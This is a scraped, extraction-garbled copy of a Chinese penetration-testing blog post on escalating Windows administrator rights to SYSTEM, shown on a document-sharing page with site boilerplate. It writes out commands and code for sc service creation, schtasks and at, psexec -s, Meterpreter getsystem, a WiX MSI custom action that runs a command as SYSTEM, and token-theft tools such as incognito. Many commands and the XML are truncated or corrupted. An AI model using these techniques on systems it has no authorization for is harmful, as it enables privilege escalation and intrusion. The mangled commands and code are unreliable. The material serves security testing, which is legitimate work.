技术博客从权限切换到s3gstudent good in study attitude and health_第1页
技术博客从权限切换到s3gstudent good in study attitude and health_第2页
技术博客从权限切换到s3gstudent good in study attitude and health_第3页
已阅读5页,还剩4页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、3gstudentGood in study, attitude and healthBlog About渗透技巧从Admin权限切换到System权限0x00 前言在渗透测试中,某些情况下需要用到system权限,例如操作 表HKEY_LOCAL_MACHINESAMSAM恰巧最近看到了一篇文章介绍了几种获得system权限的方法,于是决定结合 的经验对这方面的技巧做系统整理当然,前提是已经获得系统的管理员权限学习 :0x01 简介本文将要介绍以下内容:通过创建服务获得System权限的方法利用MSIExec获得System权限的方法利用token 获得System权限的方法0x02 通过创

2、建服务获得System权限1、通过sc命令实现sc Create TestService1 binPath= "cmd /c start" type= own ty sc start TestService1该方法在XP系统可以使用Win7下使用时 台提示:警告: 服务 TestService1 被配置为交互式服务,其支持正受到抨击。该服务可能无法正常起作用。服务启动时弹框,需要点击查看消息才能执行代码,如下图Win8下 台提示错误,无法使用该方法2、通过计划任务使用at命令:at 7:50 notepad.exe默认以system权限启动,适用于Win7 从Win8开始不

3、再支持at命令使用schtasks命令:创建服务,以system权限启动:schtasks /Create / estService2 /SC DAILY /ST 00:36 /TR notepad.exe /RU SYSTEM查看服务状态:schtasks /Query / estService2删除服务:schtasks /Delete / estService2 /F注:使用schtasks创建服务后记得手动删除schtasks命令支持Win7-Win103、利用psexec使用psexec会创建PSEXESVC服务,产生日志Event 4697、Event 7045、Event 462

4、4和Event 4652以system权限启动:psexec.exe -accepteula -s -d notepad.exe默认情况下,system权限的进程 在用户桌面显示,如果需要显示进程界面,可以加/i参数,命令如下:psexec.exe -accepteula -s -i -d notepad.exe如下图4、Meterpreter参考Meterpreter的方法:创建system权限的服务,提供一个命名管道创建进程,连接到该命名管道可供参考的代码:需要getsystem-offline.exe和getsystem_service.exe 测试如下图注:vs2012直接编译存在bu

5、g,可将函数snprintf替换为_snprintf0x03 利用MSIExec获得System权限我曾在之前的文章渗透测试中的msiexec介绍过利用Advanced Installer制作msi文件的方法,这里不再赘述本节对XPN提到的方法做复现,使用wix3制作msi文件wix3 地址:msigen.wix的代码可参考如下地址:编译命令如下:candle.exe msigen.wix torch.exe msigen.wixobj我对XPN的代码做了修改,将payload替换为执行calc.exe,细节上做了部分修改,代码 如下:<?xml version="1.0&qu

6、ot;?><Wix xmlns=""><Product Id="*" UpgradeCode="12345678-1234-1234-1234-1111 Name" Version="0.0.1" Manufacturer="_xpn_" Language="1033"<Package InstallerVersion="200" Compressed="yes" Commen<Media Id=&q

7、uot;1" /><Directory Id="TARGETDIR" Name="SourceDir"><Directory Id="ProgramFilesFolder"><Directory Id="INSTALLLOCATION" Name="Example"><Component Id="ApplicationFiles" Guid="12345678-1</Component></

8、Directory></Directory></Directory><Feature Id="DefaultFeature" Level="1"><ComponentRef Id="ApplicationFiles"/></Feature><Property Id="cmdline">calc.exe</Property><CustomAction Id="SystemShell" Execute=&

9、quot;deferred" Direc ExeCommand='cmdline' Return="ignore" Im ate="no"/><CustomAction Id="FailInstall" Execute="deferred" Scrip invalid vbs to fail install</CustomAction><InstallExecuteSequence><Custom Action="SystemShell&

10、quot; After="InstallInitialize<Custom Action="FailInstall" Before="InstallFiles"></</InstallExecuteSequence></Product>经过 测试,使用torch.exe将msigen.wixobj编译成msigen.msi文件会报错,如下图使用light.exe能够 生成msigen.msi,如下图虽然报错,但不影响文件的生成和功能的执行也就是说,完整编译命令如下:直接双击执行msigen.msi会弹框

11、,启动的calc.exe为system权限命令行下执行:msiexec /q /i msigen.msi启动的calc.exe为high权限0x04 利用token 获得System权限candle.exe msigen.wix light.exe msigen.wixobj</Wix>可参考之前的文章:渗透技巧Token窃取与利用通过 system权限的token,使进程获得system权限,常用工具如下:1、incognitoincognito.exe execute -c "NT AUTHORITYSYSTEM" cmd.exe地址:2、Invoke-TokenManipulation.ps1Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authoritysystem"地址:TokenManipulation.ps13、SelectMyParentSelectMyParent.exe cmd.exe 504参考地址:authority/blob/master/SelectMyParent.cppAuthor

人人文库> 全部分类> 应用文书

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论